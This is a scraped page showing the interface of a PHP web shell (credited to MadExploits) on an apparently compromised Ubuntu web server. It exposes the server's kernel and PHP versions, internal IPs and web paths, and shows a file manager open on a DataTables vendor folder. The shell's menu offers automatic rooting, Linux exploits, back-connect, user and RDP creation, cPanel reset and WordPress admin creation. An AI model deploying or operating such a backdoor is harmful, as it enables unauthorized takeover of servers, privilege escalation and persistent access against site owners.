Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
admins /
vendor /
jquery-datatables /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-x--x
extensions
[ DIR ]
drwxr-x--x
extras
[ DIR ]
drwxr-x--x
media
[ DIR ]
drwxr-x--x
Contributing.md
1.08
KB
-rwxr-x--x
Readme.md
2.61
KB
-rwxr-x--x
bower.json
190
B
-rwxr-x--x
composer.json
541
B
-rwxr-x--x
dataTables.jquery.json
838
B
-rwxr-x--x
license.txt
1.08
KB
-rwxr-x--x
package.json
730
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Contributing.md
# Contributing If you are thinking of contributing code to DataTables, first of all, thank you! All fixes, patches and enhancements to DataTables are very warmly welcomed. In order to keep thing manageable, there are a number of guidelines that should be followed in order to ensure that your modification is included in DataTables as quickly as possible: 1. Make contributions in the DataTables/DataTablesSrc repo. Changes to the built files in the built repo (DataTables/DataTables) will not be accepted since they would be overwritten by the next build! 2. Follow the style of the code in the existing files. DataTables doesn't have a coding standards document, but simple common sense of following the same style as in the existing files is ideal. For example use tabs not spaces (as you will see all source files use tabs). 3. Link to a test page showing the bug you are fixing or the feature you are adding. This allows to me to quickly identify what is being changed and why. Don't worry about being verbose in pull requests - its much better to know exactly what is changing and why!
Close